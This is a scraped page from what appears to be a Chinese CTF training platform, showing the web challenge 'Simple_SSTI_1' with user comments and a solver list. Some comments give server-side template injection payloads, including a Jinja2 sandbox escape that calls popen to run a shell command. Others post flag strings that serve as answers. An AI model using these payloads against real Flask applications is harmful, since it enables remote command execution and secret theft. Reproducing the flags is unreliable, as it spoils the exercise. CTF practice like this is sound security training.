Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 28107
提  示:
描  述:
Simple_SSTI_1
评论
不懂就问 1年前

详细参考学习:https://blog.csdn.net/qq_36292543/article/details/136032550

回复 9

hejichang 1年前

flag{aced0e1bd96119f41a58510c28cfec11}

回复 0
用涉大川 1年前

每个人的flag都不一样,我的是flag{ddf1c0bc7f8ee46225efe4bf142c0079}

回复 0

ccsuaw 1年前

SECRET_KEY是什么? SECRET_KEY其实就是一个加密盐,用在django和flask的session、cookies等加密中。 所以payload为?flag={{config.SECRET_KEY}} 为什么是config.SECRET_KEY? 因为一般定义SECRET_KEY的config.py的源码是这样的: class Config(objec

回复 13

18483555203 1年前

flag{16346b3ff029db0cedd2d4d2df81df5a}

回复 0

2027347950 1年前

?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}

回复 1

iii1 1年前

?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']('echo $FLAG').read()}}

回复 2

DragonWE 1年前

flag{9c260fb48e0a0db7708b6f3ebe9ff732}

回复 0

iain4048 1年前

查看源代码提示找secret key value

回复 0

13663536751 1年前

flag{e0ad0234936fcd15f11c7bb0f9d587e7}

回复 0
2346254613 1年前

这个是答案吗

回复 1

啊这这 1年前

使用{{config}}获得flag,因为config是用来获取当前配置的,配置主要有cookie名字和值之类的,这里的flag就是存放在cookie中(个人理解,如果不对请矫正)

回复 3

WriteUp

image
valecalida

5 金币

评分(49)

解题动态

HK1ng 攻破了该题 10小时前
sun_space 攻破了该题 13小时前
zbss 攻破了该题 1天前
ct1640 攻破了该题 1天前
liuliuliu666 攻破了该题 3天前
r00t2025 攻破了该题 4天前
1748684229 攻破了该题 6天前
17778438489 攻破了该题 6天前
yangty 攻破了该题 9天前
smtall 攻破了该题 9天前
3028545694 攻破了该题 10天前
看writeup刷题 攻破了该题 12天前
炸鱼饼 攻破了该题 13天前
2183946334 攻破了该题 14天前
玉天问 攻破了该题 15天前
卯壬在此 攻破了该题 16天前
33538626867 攻破了该题 16天前
jiangnanwithrain 攻破了该题 17天前
SecondLovevirtualKuhn 攻破了该题 17天前
吃个大西瓜 攻破了该题 18天前
问题反馈